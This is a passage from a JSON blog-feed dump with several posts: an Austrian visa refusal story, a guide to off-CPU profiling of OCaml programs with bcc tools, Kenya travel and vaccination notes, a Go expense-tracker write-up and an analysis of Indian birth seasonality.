Story","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Faustrian-visa-refusal-jan-2024\u002F","Sun, 11 Aug 2024 11:59:04 +0530","Vienna - the capital of Austria - is one of the most visited cities in the world, popular for its rich history, gardens, and cafes, along with well-known artists like Beethoven, Mozart, Gödel, and Freud. It has also been consistently ranked as the most livable city in the world.\nFor these reasons, I was elated when my friend Snehal invited me last year to visit Vienna for a few days. We included Christmas and New Year’s Eve in my itinerary due to the city’s popular Christmas markets and lively events. The festive season also ensured that Snehal had some days off for sightseeing.\nIndians require a visa to visit Austria. Since the travel dates were near, I rushed to book an appointment online with VFS Global in Delhi, and quickly arranged the required documents. However, at VFS, I found out that I had applied in the wrong appointment category (tourist), which depends on the purpose of the visit, and that my travel dates do not allow enough time for visa authorities to make a decision. Apparently, even if you plan to stay only for a part of the trip with the host, you need to apply under the category “Visiting Friends and Family”.\nThus, I had to book another appointment under this category, and took the opportunity to shift my travel dates to allow at least 15 business days for the visa application to be processed, removing Christmas and New Year’s Eve from my itinerary.\nThe process went smoothly, and my visa application was submitted by VFS. For reference, here’s a list of documents I submitted -\nVFS appointment letter\nDuly-filled visa application form\nOriginal passport\nCopy of passport\n1 photograph\nMy 6 months bank account statement\nCover letter\nConsent form (that visa processing will take up to 15 business days)\nSnehal’s job contract\nMy work contract\nRent contract of Snehal\nResidence permit of Snehal\nA copy of Snehal’s passport\nInvitation letter from Snehal\nReturn flight ticket reservations\nTravel insurance for the intended travel dates\nThe following charges were collected from me.\nService Description\nAmount (Indian Rupees)\n\n\n\n\nCash Handling Charge - SAC Code: (SAC:998599)\n0\n\n\nVFS Fee - India - SAC Code: (SAC:998599)\n1,820\n\n\nVISA Fee - India - SAC Code:\n7,280\n\n\nConvenience Fee - SAC Code: (SAC:998599)\n182\n\n\nCourier Service - SAC Code: (SAC:998599)\n728\n\n\nCourier Assurance - SAC Code: (SAC:998599)\n182\n\n\nTotal\n10,192\n\n\n\nI later learned that the courier charges (728 INR) and the courier assurance charges (182 INR) mentioned above were optional. However, VFS didn’t ask whether I wanted to include them. When the emabssy is done processing your application, it will send your passport back to VFS, from where you can either collect it yourself or get it couriered back home, which requires you to pay courier charges. However, courier assurance charges do not add any value as VFS cannot “assure” anything about courier and I suggest you get them removed.\nMy visa application was submitted on the 21st of December 2023. A few days later, on the 29th of December 2023, I received an email from the Austrian embassy asking me to submit an additional document -\nSubject: AUSTRIAN VISA APPLICATION - AMENDMENT REQUEST: Ravi Dwivedi VIS 4331\nDear Applicant,\nOn 22.12.2023 your application for Visa C was registered at the Embassy. You are requested to kindly send the scanned copies of the following documents via email to the Embassy or submit the documents at the nearest VFS centre, for further processing of your application:\nKindly submit Electronic letter of guarantee “EVE- Elektronische Verpflichtungserklärung” obtained from the “Fremdenpolizeibehörde” of the sponsor’s district in Austria. Once your host company\u002Finviting company has obtained the EVE, please share the reference number (starting from DEL_____) received from the authorities, with the Embassy.\nI misunderstood the required document (the EVE) to be a scanned copy of the letter of guarantee form signed by Snehal, and responded by attaching it.\nUpon researching, Snehal determined that the document is an electronic letter of guarantee, and is supposed to be obtained at a local police station in Vienna. He visited a police station the next day and had a hard time conversing due to the language barrier (German is the common language in Austria, whereas Snehal speaks English). That day was a weekend, so he took an appointment for Monday, but in the meantime the embassy had finished processing my visa.\nMy visa was denied, and the refusal letter stated:\nThe Austrian embassy in Delhi examined your application; the visa has been refused.\nThe decision is based on the following reason(s):\nThe information submitted regarding the justification for the purpose and conditions of the intended stay was not reliable.\nThere are reasonable doubts as to your intention to leave the territory of the Member States before the expiry of the visa.\nOther remarks:\nYou have been given an amendment request, which you have failed to fulfil, or have only fulfilled inadequately, within the deadline set.\nYou are a first-time traveller. The social and economic roots with the home country are not evident. The return from Schengen territory does therefore not seem to be certain.\nI could have reapplied after obtaining the EVE, but I didn’t because I found the following line\nThe social and economic roots with the home country are not evident.\noffensive for someone who was born and raised in India, got the impression that the absence of electronic guarantee letter was not the only reason behind the refusal, had already wasted 12,000 INR on this application, and my friend’s stay in Austria was uncertain after January. In fact, my friend soon returned to India.\nTo summarize -\nIf you are visiting a host, then the category of appointment at VFS must be “Visiting Friends and Family” rather than “Tourist”.\nVFS charged me for courier assurance, which is an optional service. Make sure to get these removed from your bill.\nNeither my travel agent nor the VFS application center mentioned the EVE.\nWhile the required documents list from the VFS website does mention it in point 6, it leads to a dead link.\nSnehal informed me that a mere two months ago, his wife’s visa was approved without an EVE. This hints at inconsistency in processing of applications, even those under identical categories.\nSuch incidents are a waste of time and money for applicants, and an embarrassment to VFS and the Austrian visa authorities. I suggest that the Austrian visa authorities fix that URL, and provide instructions for hosts to obtain the EVE.\nCredits to Snehal and Contrapunctus for editing, Badri for proofreading.",[],{"slug":897,"title":898,"link":899,"pubDate":900,"contentSnippet":901,"tags":902,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"offcputime-analysis","Off-CPU-time analysis","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Foffcputime\u002Fbpfcc\u002F2024\u002F07\u002F24\u002Foffcputime-analysis\u002F","2024-07-24T09:48:00.000Z","Off-CPU analysis is where the program behavior when it is not running is\nrecorded and analysed. See Brendan Gregg’s eBPF based off-CPU\nanalysis. While on-CPU\nperformance monitoring tools such as perf give you an idea of where the\nprogram is actively spending its time, they won’t tell you where the program\nis spending time blocked waiting for an action. Off-CPU analysis reveals\ninformation about where the program is spending time passively.\nInstallation\nInstall the tools from https:\u002F\u002Fgithub.com\u002Fiovisor\u002Fbcc\u002F.\nEnabling frame pointers\nThe off-CPU stack trace collection, offcputime-bpfcc, requires the programs to\nbe compiled with frame pointers for full backtraces.\nOCaml\nFor OCaml, you’ll need a compiler variant with frame pointers enabled. If you\nare installing a released compiler using opam, you can create one the following \nswitch command opam switch create 5.2.0+fp 5.2.0 ocaml-option-fp. Change out \n5.2.0 for your preferred OCaml version.\nInstead, if you are building the OCaml compiler from source, configure the\ncompiler with --enable-frame-pointers option:\n\n$ .\u002Fconfigure --enable-frame-pointers\n\n\nLastly, there is an option to create an opam switch with the development branch\nof the compiler. The instructions are in ocaml\u002FHACKING.adoc. In order to\ncreate an opam switch from the current working directory, do:\n\n$ opam switch create . 'ocaml-option-fp' --working-dir\n\n\nglibc\nThe libc is not compiled with frame pointers by default. This will lead to many\ntruncated stack traces. On Ubuntu, I did the following to get a glibc with frame\npointers enabled:\nInstall glibc with frame pointers\n    \n\n$ sudo apt install libc6-prof\n\n    \nLD_PRELOAD the glibc with frame pointers\n    \n\n$ LD_PRELOAD=\u002Flib\u002Flibc6-prof\u002Fx86_64-linux-gnu\u002Flibc.so.6 .\u002Fmyapp.exe\n\n    \nRunning\nOn one terminal run the program that you want to analyze:\n\n$ LD_PRELOAD=\u002Flib\u002Flibc6-prof\u002Fx86_64-linux-gnu\u002Flibc.so.6 .\u002Focamlfoo.exe\n\n\nOn another terminal run offcputime-bpfcc tool:\n\n$ sudo offcputime-bpfcc --stack-storage-size 2097152 -p $(pgrep -f ocamlfoo.exe) 10 > offcputime.out\n\n\nThe command instruments the watches for 10s and the writes out the stack traces\ncorresponding to blocking calls in offcputime.out. We use a large stack\nstorage size argument so as to not lose stack traces. Otherwise, you will see\nmany [Missing User Stack] errors in the back traces.\nCaveats\noffcputime-bpfcc must run longer than the program being instrumented by a few\nseconds so that the function symbols are resolved. Otherwise you may see\n[unknown] in the backtrace for function names.\nOddities\nI still see an order of magnitude difference between the maximum pauses observed\nusing offcputime-bpfcc and olly trace. Something is off.\nOther links\nhttps:\u002F\u002Fwww.pingcap.com\u002Fblog\u002Fhow-to-trace-linux-system-calls-in-production-with-minimal-impact-on-performance\u002F",[],{"slug":904,"title":905,"link":906,"pubDate":907,"contentSnippet":908,"tags":909,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"on-software-as-an-indiscipline","On software as an \"in-discipline\"","https:\u002F\u002Fnadh.in\u002Fblog\u002Fon-software-as-an-indiscipline\u002F","Wed, 24 Jul 2024 00:00:00 +0000","The nth-order effects of the recent CrowdStrike fiasco [1][2][3] will unfold over time. As it stands, it is apparently the single biggest global “tech outage” ever, which has already disrupted everything from airlines to railways to hospitals to financial systems amongst numerous others—globally.",[],{"slug":911,"title":912,"link":913,"pubDate":914,"contentSnippet":915,"tags":916,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"it-admins-battle-windows-blue-screen-of-death-after-faulty-update","IT Admins Battle Windows Blue Screen of Death After Faulty Update","https:\u002F\u002Fibcomputing.com\u002Fit-admins-battle-windows-blue-screen-of-death-after-faulty-update\u002F","Fri, 19 Jul 2024 22:44:17 +0000","How IT Admins Are Fixing the Windows Blue Screen of Death IT administrators worldwide are in crisis mode today due to a major issue with … \nThe post IT Admins Battle Windows Blue Screen of Death After Faulty Update appeared first on IB Computing.",[13],{"slug":918,"title":919,"link":920,"pubDate":921,"contentSnippet":922,"tags":923,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"googles-goo-gl-link-shortener-expire-in-aug-2025","Google’s Goo.gl Link Shortener Expire in Aug 2025","https:\u002F\u002Fibcomputing.com\u002Fgoogles-goo-gl-link-shortener-expire-in-aug-2025\u002F","Fri, 19 Jul 2024 22:30:54 +0000","Google’s Goo.gl Link Shortener Expire on Aug 2025 Hold onto your hyperlinks, folks!  Google’s Goo.gl Link Shortener Expire soon. it  is officially nearing the end … \nThe post Google’s Goo.gl Link Shortener Expire in Aug 2025 appeared first on IB Computing.",[13],{"slug":925,"title":926,"link":927,"pubDate":928,"contentSnippet":929,"tags":930,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"wikipedia-launches-long-awaited-dark-mode-feature","Wikipedia Launches Long-Awaited Dark Mode Feature","https:\u002F\u002Fibcomputing.com\u002Fwikipedia-launches-long-awaited-dark-mode-feature\u002F","Thu, 18 Jul 2024 21:43:01 +0000","Dark Mode Finally Arrives After years of anticipation, Wikipedia introduces dark mode, now available on select wikis for both mobile and desktop in reading and … \nThe post Wikipedia Launches Long-Awaited Dark Mode Feature appeared first on IB Computing.",[13,931,932],"dark mode","wikipedia",{"slug":934,"title":935,"link":936,"pubDate":937,"contentSnippet":938,"tags":939,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kenya-visa-process","Kenya Visa Process","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkenya-visa-process\u002F","Sun, 14 Jul 2024 16:24:02 +0530","Prior to arrival in Kenya, you need to apply for an Electronic Travel Authorization (eTA) on their website by uploading all the required documents. This system is in place since Jan 2024 after the country abolished the visa system. The required documents will depend on the purpose of your visit, which in my case, was to attend a conference.\nHere is the list of documents I submitted for my eTA:\nScanned copy of my passport\nPhotograph with white background\nFlight tickets (reservation)\nHotel bookings (reservation)\nInvitation letter from the conference\nYellow Fever vaccination certificate (optional)\nJob contract (optional)\n“Reservation” means I didn’t book the flights and hotels, but rather reserved them. Additionally, “optional” means that those documents were not mandatory to submit, but I submitted them in the “Other Documents” section in order to support my application. After submitting the eTA, I had to make a payment of around 35 US Dollars (approximately 3000 Indian Rupees).\nIt took 40 hours for me to receive an email from Kenya stating that my eTA has been approved, along with an attached PDF, making this one of my smoothest experiences of obtaining travel documents to travel to a country :). An eTA is technically not a visa, but I put the word “visa” in the title due to familiarity with the term.",[],{"slug":941,"title":942,"link":943,"pubDate":944,"contentSnippet":945,"tags":946,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-11","Poor man's job runner with Clojure Agents","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fpoor-mans-job-runner-clojure-agents\u002Findex.html","Sun, 14 Jul 2024 00:00:00 +0000","On (mis)using Clojure's concurrency features to make an in-memory job runner, because I needed an excuse to use more than atoms for once. Definitely not Rich Hickey's \"Ants\" demo.",[49,456,52,533],{"slug":948,"title":949,"link":950,"pubDate":951,"contentSnippet":952,"tags":953,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"yellow-fever-vaccine","Yellow Fever Vaccine","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fyellow-fever-vaccine\u002F","Sat, 13 Jul 2024 13:26:03 +0530","Recently, I got vaccinated with yellow fever vaccine as I am planning to travel to Kenya, a high risk country for yellow fever, in the near future. It should be taken at least 10 days before getting into the areas with yellow fever transmission to provide enough time for the formation of the antibodies. In order to get vaccinated, I searched for vaccination centers in Delhi and stumbled upon this page by the Indian government, which lists vaccination centers for yellow fever all over India. From that list, I made a phone call to the Airport Health Organization, a vaccination center near the Delhi Airport.\nThey asked me to write an email stating that I need yellow fever vaccination. After sending the email, they prompted me to attach a scanned copy of my passport data page, upon sending which they emailed me my appointment date, asking me to pay 300 INR in advance along with other instructions. The appointment date was 4 days after I sent scanned copy of my passport. The email also mentioned that those who are allergic to eggs or have never taken eggs should instead visit RML Hospital.\nThe vaccination center must be visited during 10 AM to 12 noon on the date of appointment. I reached there at around 11 AM and got vaccinated in around 40 minutes, followed by obtaining a vaccine certificate in half an hour.\nOne dose of this vaccine gives immunity against yellow fever for lifetime. Therefore, I can travel to any country with yellow fever transmission after getting this dose. Although some countries may require proof of vaccination within some time frame and some people might need a booster dose to maintain immunity.",[],{"slug":955,"title":956,"link":957,"pubDate":958,"contentSnippet":959,"tags":960,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"thinking","Thinking...","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fthinking\u002F","Mon, 08 Jul 2024 15:49:50 +0000","It’s late, I am sitting in my chair with my laptop in my lap, a drizzle of rain is falling outside and I can hear constant plunk plunk plunk sounds of the rain hitting the floor, a cool breeze is running through my room. A table fan is running pointing away from myself because otherwise it feels too cold.\nI sit while I think about the world around me. That’s what I do when I am bored, I marvel about the world, it’s enormity and beauty.",[],{"slug":962,"title":963,"link":964,"pubDate":965,"contentSnippet":966,"tags":967,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"living-offgrid","Living Off-grid","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fliving-offgrid\u002F","Fri, 14 Jun 2024 09:19:34 +0000","Infrastructure is fascinating, atleast to me. Recently I have been reading up about the infrastructure required for research at The South Pole. A lot of the things which we take for granted while we carry out our daily lives are not readily available there. The average annual temperature is around -49°C which means that water in liquid form is not available. What they have to do instead is pump heated water to a structure which is called Rodwell which forms an underground lake of water, heated water is continuously pumped to this through insulated pipes to ensure that it does not freeze.",[],{"slug":969,"title":970,"link":971,"pubDate":972,"contentSnippet":973,"tags":974,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gullak","Building an expense tracker app","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgullak\u002F","2024-06-14T00:00:00.000Z","A couple of weeks ago, I decided to start logging and tracking my expenses. The goal was not to record every minor purchase but to gain a general insight into where my money was going. In this post, I’ll dive deep into the behind-the-scenes of building Gullak—an expense tracker app with a dash of AI (yes).\n\n\n\nWhy#\nMy wife and I have a simple system for tracking our expenses during trips: we use Apple Notes to maintain a day-wise record, jotting down a one-liner for each expense under the date. This straightforward method has proven effective in keeping tabs on our spending habits while traveling.\nFor instance, during our last Europe trip, we recorded our daily expenses. After returning home, I was eager to analyze our spending patterns. I copied all these items into Google Sheets to analyse the top categories that I spent on during the trip.\n\nI decided to develop a simple expense tracker app that automatically categorizes expenses into various groups like food, travel, shopping, etc. I believed this was a practical use case for leveraging an LLM paired with Function calling to parse and categorize expenses.\nInitial Prototype#\nThe first step involved designing a prompt to capture user input about their spending. I picked up go-openai library and experimented with it.\nAlmost a year ago, I had developed a small bot for personal use, which provided a JSON output detailing the macronutrients and calories in specific food items, storing this information in Metabase. However, this was during the early days of API access provided by OpenAI. Due to occasionally unsatisfactory and inconsistent responses (despite instructions like “MUST RETURN JSON OR 1000 CATS WILL D*E SOMEWHERE”), it wasn’t entirely reliable.\nFunction calling addresses two main limitations of traditional language model responses:\nInconsistent response format: Without function calling, responses from language models can be unstructured and inconsistent, requiring complex validation and parsing logic on the application side.\nLack of external data integration: Language models are typically limited to the knowledge they were trained on, making it challenging to provide answers based on real-time or external data.\nIt’s important to note that the LLM does not actually execute any functions. Rather, we create a structure for the LLM to follow in its responses. The LLM would then generate a response with the content as a stringified JSON object following the schema provided in the function definiton.\nI created a function called categorize_expense. This function takes a list of transactions as parameters, with each transaction having properties like transaction_date, amount, category, and description.\nHere’s what this looks like:\nfnCategorizeExpenses := openai.FunctionDefinition{\n  Name:        \"categorize_expense\",\n  Description: \"Categorize expenses from the given input.\",\n  Parameters: jsonschema.Definition{\n    Type: jsonschema.Object,\n    Properties: map[string]jsonschema.Definition{\n      \"transactions\": {\n        Type:        jsonschema.Array,\n        Description: \"List of items purchased\",\n        Items: &jsonschema.Definition{\n          Type: jsonschema.Object,\n          Properties: map[string]jsonschema.Definition{\n            \"transaction_date\": {\n              Type:        jsonschema.String,\n              Description: \"Date of transaction in ISO 8601 format (e.g., 2021-09-01) if specified else today's date.\",\n            },\n            \"amount\": {\n              Type:        jsonschema.Number,\n              Description: \"Amount of the item\",\n            },\n            \"category\": {\n              Type:        jsonschema.String,\n              Description: \"One word category of the expense (e.g., food, travel, entertainment)\",\n            },\n            \"description\": {\n              Type:        jsonschema.String,\n              Description: \"Concise and short description of the item\",\n            },\n          },\n          Required: []string{\"transaction_date\", \"amount\", \"category\", \"description\"},\n        },\n      },\n    },\n    Required: []string{\"transactions\"},\n  },\n}\nThe response from this API call can then be unmarshalled into a struct.\nvar transactions models.Transactions\n\nif err := json.Unmarshal([]byte(toolCall.Function.Arguments), &transactions); err != nil {\n    return err\n}\nThe next step was to determine exactly how users would provide input. I considered various methods that would make entering expenses as straightforward as my approach with Apple Notes and decided to create a Telegram bot.\n\nI developed a Telegram bot that would parse the expenses and save them to a SQLite database. I explored tools like evidence.dev, a nice platform for creating frontends using the database as the sole source of truth. However, I encountered an issue where it could not correctly parse date values (see GitHub issue). Ultimately, I returned to my reliable old friend—Metabase.\nHowever, I faced two main challenges with this approach:\nPrivacy Concerns: Telegram does not offer the option to create a private bot; all bots generated through BotFather are public. To restrict access, I considered adding session tokens, but this approach was unsatisfactory. If I planned to distribute this bot, implementing a token-based, DIY authentication system on Telegram did not seem appropriate.\nFixing Bad Entries: To correct erroneous entries, I had to manually update the SQLite table. As I intended to share this bot with my wife, I needed a more user-friendly workflow. Manually raw dogging UPDATE SQL queries was not the most user-friendly solution.\nAfter a day or two of experimenting, I decided to build a small frontend for now.\nBuilding Frontend#\n\nAs a backend developer, my core expertise is NOT JavaScript, and I strongly dislike the JS ecosystem. Obviously there’s no dearth of choices when it comes to frameworks, however for this project I wanted to stay away from the hype and choose a stack that is simple to use and productive (for me) out of the box. Having used Vue.js in production in the past, I feel it ticks those boxes for me as it comes bundled with a router, store, and all the niceties, and it has excellent documentation. After reading a refresher on the new Vue3 composition API syntax, I hit the ground running.\nI find Tailwind CSS ideal for someone like me who prefers not to write CSS or invent class names. It’s a heavily debated topic online, but it’s important to pick our battles. An issue I encountered while researching UI frameworks was that Vue.js seems to have fewer options compared to React, likely due to its lower popularity. After some google-fu, I discovered a promising project called shadcn-vue, an unofficial community led port of the shadcn\u002Fui React library.\nThe cool thing about this library is that it doesn’t come bundled as a package, meaning there’s no way to install it as a dependency. Instead, it gets added directly to your source code, encouraging you to tweak it the way you like.\nI believe it’s an excellent starting point for anyone looking to build their own design system from scratch, as it allows for customization of both appearance and behavior. It might have been overkill for my simple UI, but I thought, what the heck, if side projects aren’t for exploring new things, what’s the point of it all? 😄\nDatabase#\nFor the database, I opted for SQLite. It’s perfect for a small project like this since the database is just a single file, making it easier to manage. Initially, I used the popular driver mattn\u002Fgo-sqlite3, but I found that the CGO-free alternative modernc\u002Fsqlite works just as well.\nI also experimented with sqlc for the first time. For those unfamiliar, sqlc generates type-safe Go code from your raw SQL queries. It handles all the boilerplate database code needed to retrieve results, scan them into a model, manage transactions, and more. sqlc makes it seem like you’re getting the best of both worlds (ORM + raw SQL).\nHere’s an example query:\n-- name: CreateTransaction :many\n-- Inserts a new transaction into the database.\nINSERT INTO transactions (created_at, transaction_date, amount, currency, category, description, confirm)\nVALUES (?, ?, ?, ?, ?, ?, ?)\nRETURNING *;\nUsing sqlc generate, it generates the following code:\n\u002F\u002F Code generated by sqlc. DO NOT EDIT.\n\u002F\u002F versions:\n\u002F\u002F   sqlc v1.26.0\n\u002F\u002F source: queries.sql\n\npackage db\n\nimport (\n\t\"context\"\n\t\"database\u002Fsql\"\n\t\"time\"\n)\n\nconst createTransaction = `-- name: CreateTransaction :many\nINSERT INTO transactions (created_at, transaction_date, amount, currency, category, description, confirm)\nVALUES (?, ?, ?, ?, ?, ?, ?)\nRETURNING id, created_at, transaction_date, currency, amount, category, description, confirm\n`\n\ntype CreateTransactionParams struct {\n\tCreatedAt       time.Time `json:\"created_at\"`\n\tTransactionDate time.Time `json:\"transaction_date\"`\n\tAmount          float64   `json:\"amount\"`\n\tCurrency        string    `json:\"currency\"`\n\tCategory        string    `json:\"category\"`\n\tDescription     string    `json:\"description\"`\n\tConfirm         bool      `json:\"confirm\"`\n}\n\n\u002F\u002F Inserts a new transaction into the database.\nfunc (q *Queries) CreateTransaction(ctx context.Context, arg CreateTransactionParams) ([]Transaction, error) {\n\trows, err := q.query(ctx, q.createTransactionStmt, createTransaction,\n\t\targ.CreatedAt,\n\t\targ.TransactionDate,\n\t\targ.Amount,\n\t\targ.Currency,\n\t\targ.Category,\n\t\targ.Description,\n\t\targ.Confirm,\n\t)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\titems := []Transaction{}\n\tfor rows.Next() {\n\t\tvar i Transaction\n\t\tif err := rows.Scan(\n\t\t\t&i.ID,\n\t\t\t&i.CreatedAt,\n\t\t\t&i.TransactionDate,\n\t\t\t&i.Currency,\n\t\t\t&i.Amount,\n\t\t\t&i.Category,\n\t\t\t&i.Description,\n\t\t\t&i.Confirm,\n\t\t); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\titems = append(items, i)\n\t}\n\tif err := rows.Close(); err != nil {\n\t\treturn nil, err\n\t}\n\tif err := rows.Err(); err != nil {\n\t\treturn nil, err\n\t}\n\treturn items, nil\n}\nApple Shortcuts#\nSimilar to my Apple Notes approach, I wanted to create a shortcut that would allow me to log expenses quickly. I created a simple shortcut that would prompt me to enter the expenses and send an HTTP POST request to Gullak’s API server. I then open the dashboard once in a while to confirm\u002Fedit these unconfirmed transactions.\nYou can read more about setting up the Shortcut in your Apple devices here.\nProudly, Not a Weekend Project#\nFor every “I could do this in a weekend” comment, yes, this project is straightforward—a “CRUD GPT” wrapper that isn’t complicated to build. Yet, it took me over a month to develop. I spent less than an hour most days on this project, instead of cramming it into an all-nighter weekend project - an approach I want to move away from. Slow and steady efforts compound, outlasting quick, sporadic bursts. I’m pleased to balance this with my full-time job without burning out.\nIdeas for the Future#\nInitially, I didn’t set out to build a comprehensive budgeting app, just an expense logger, as that was my primary need. However, if usage increases and the tool proves helpful in reducing unnecessary spending, I’m open to adding more features. Some possibilities include a subscription tracker, integration with budgeting tools like YNAB or Actual through their APIs, and monthly reports sent via email. The best part is that you own complete data, as the data is stored locally on your device so you can also export it anytime and build other integrations on top of it.\nFeel free to open a GitHub issue or reach out if you have any suggestions or feedback. I’m excited to see where this project goes!\nUpdate (Feb 2026)#\nI’ve rewritten Gullak to use plain-text ledger files. Read more about why in the follow-up post: Why Plain-Text Ledger is Powerful for Gullak.",[],{"slug":976,"title":977,"link":978,"pubDate":979,"contentSnippet":980,"tags":981,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"augustbirthdays","Why are there so many birthdays in August?","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2024\u002F04\u002F28\u002Faugustbirthdays\u002F","2024-04-27T18:30:00.000Z","One of my fond memories while growing up in Rawatbhata, a small town (and now a city!) of Rajasthan was birthday parties. These birthday parties used to be simple. We were all a bunch of similar-aged kids and would just invite each other for a mini celebration.\nEverything about these parties was simple. The people were simple. The invitation was simple - you visited each house and verbally invited everyone. The food was simple. There were no starters, a couple of large bottles of ThumpsUp would suffice and was often served in steel glasses which would come out just for this occasion. There was only one simple course - the main course with pulao (rice + sautéed veggies), poori (fried flatbread), dessert (gulab jamun or kheer), chole (chickpeas), and well, a piece of cake. Paneer had not entered the menu yet, though it was sometimes on the menu if you were invited home for dinner.\nThe music was simple and the dance was simple. Bollywood’s top four dance numbers would play on a loop from a Philips cassette player that everyone had. It was available at a discount for everyone or I recall. And yes, there were simple “return gifts” - a Nataraj pencil and a Non-dust eraser. Simple times.\n\n\nThere were no bakeries in Rawatbhata for a long time, and almost all cakes were home-baked. No one in the town had ovens! There were no microwaves either. The only electrical gadget in the kitchen used to be a mixer grinder. How do you “bake” without an “oven”? The technique uses a simple idea - use sand to provide controlled heating. Too much digression. But the cakes were simple too.\n\n  \nBaking the cake on sand and stove! Source\n\n\n\n\nWhile we would get invited to all the birthdays, I do remember sneaking in uninvited to a few, once in a while. I also distinctly remember August being a month of celebrations. Of course, there was Independence Day on the 15th lined up with five birthdays in August! Five! Most other months would have one or two. Naturally, August was also my favourite month - loads of good food and return gifts. People with birthdays in August had to be extra diligent. While the simple birthday menu rarely changed, the “return gifts” required deeper thought. You did not want to be called out for repeating a return gift in the same month.\nCaught in the nostalgia of food, birthdays, and 90s music, I had a question going around in my head: Were the five birthdays in August a rare event? There are 365 days in a year and assuming no day is special, there is no reason August should be a non-simple birthday month. How do I find out if there is anything special about August, if there is? My first thought was to poll my odd group of college friends and ask them for their birthdays. However hard I try to avoid it, this would be a convenient sample, and I don’t think I would have learned anything mechanistic about the “why” or “how”.\nWhat do I need to answer my question? My question can be asked more simply: when do most Indians celebrate their birthdays? If I had access to all the Aadhaar data, this question could be answered using probably a few lines of code. Aadhaar is of course closed for these use cases. A little bit of search landed me on a wonderful resource of HMIS. The description on the website is self-explanatory:\nThis portal will be a gateway to wealth of information regarding the health indicators of India. The information available on this portal is derived data from data uploaded by the States\u002F UTs. HMIS data is specifically designed to support planning, management, and decision making based on on Grading of facilities, various indicators at Block, District at State as well as National Level.\nWhile the emphasis is on “health indicators”, HMIS has district and state-level data on how many births happen in private and public hospitals. Getting this data was quite an exercise and taught me several tricks for parsing excel\u002Fhtml. After struggling disproportionately with weirdly formatted files, I could extract all the birth data between 2008 and 2020 across states. With this data in hand, I could finally answer the simple question: was august the special birthday month?\nI first looked at the distribution of births. September, October, and August have the highest number of births with approximately 1.9 million average births over 2008-2020. Since births peak in these months, there is an inherent “seasonality” attached to birthdays in India. In a hypothetical world, all the months would have roughly equal births, rather than having a range from 1.38 million births (April) to 1.98 million births (September).\n\nTaking an average can sometimes hide a tonne of information that lies in a time-series data. If we look at the entire period between January 2008 and December 2020, the “seasonality” is easier to spot. From 2008 to 2020, the birth curve rises and dips over the year. The peaks happen around September\u002FOctober, while April registers a deep dip.\n\nWhile the data from HMIS is on births, we can infer the time of conception by simple arithmetic - subtracting 9 months. Of course, the seasonality remains intact. The peak of conceptions happens in December of the previous year or January of the same year.\n\nSummarizing information at the country level is a good starting point. Overall, September is the month with the highest number of birthdays. But does that hold across all states? What about Rajasthan? I next broke it down at the state level and annotated the month with the highest number of birthdays.\n\nFrom the figure above, August is the month with the highest number of birthdays in Rajasthan. But more importantly, the figure highlights the diversity that underlies India. While September, the month with the highest number of total births, is the month of peak births in 9 states, October is the peak month in 10 states. But there are also Meghalaya and Tripura which peak in January and December respectively. On the other extreme, July is the month of the least conceptions across multiple states. We can flip the births and look at the conception curve.\n\nWhile my actual question was answered, and I discovered that there is heterogeneity within the country in how it celebrates birthdays, my related question of understanding why this happens “mechanistically” remained unanswered. I must admit beforehand that it is also a hard question to answer without access to a tonne of data.\nWhy are conceptions higher in a month? Why do they vary across states? Is it driven by the “wedding season” in the country?\nI did not have access to the wedding registration data. So I asked a simple question: does temperature affect the rate of conception (and hence birth) in India. Surprisingly, getting temperature data for a city across a time span without paying anyone remains a non-trivial task. However after a bit of tussle and jumping language hoops, I was able to download the gridded temperature data from IMD, Pune.\nTo understand the relationship between temperature and rate of conceptions, I looked at the average temperature over 2008-2020 in a state and calculated its correlation with the number of estimated conceptions. For the autumn months (October\u002FNovember), the correlation coefficient is the highest (-0.56). But even more importantly, this figure hinted towards the seasonality being associated with temperature. The rate of conceptions across seasons varies as Winter > Autumn > Summer > Monsoon.\nI am sure you are thinking about heterogeneity, what does this relationship look like if we focus on each state individually?\n\nWhen I broke down the association analysis for each state individually and arranged the states based on the strength of the correlation (between the relative percentage of conceptions every month and the mean temperature in each state), a beautiful pattern emerged. 24 out of 28 states for which I had data show a correlation coefficient of -0.5 or lower (that is, the absolute strength of correlation exceeds 0.5). For states like Manipur, Bihar, and Haryana the association between temperature and rate of conception is as high as 0.91, implying a higher temperature is associated with fewer conceptions and a one-degree drop in temperature will lead to an increase of 0.91% in conception assuming this relationship is indeed causal. States like Jammu and Kashmir and Uttarakhand which are usually colder have weak associations. While Kerala, which has a tropical climate, has a stronger association with a correlation coefficient of -0.82. Thus, the association is not as strong for colder climates, an observation that I previously made at the season level in my previous plot.\n\nCausality is hard to prove here. We have strong associations that reproduce across states, Occam’s razor, and the golden fact that correlation does not imply causation. I wish the answer was as simple as those birthday parties.\n\nSummer has come and passed  \nThe innocent can never last  \nWake me up when September ends\n\n                - Billie Armstrong",[],"Saket 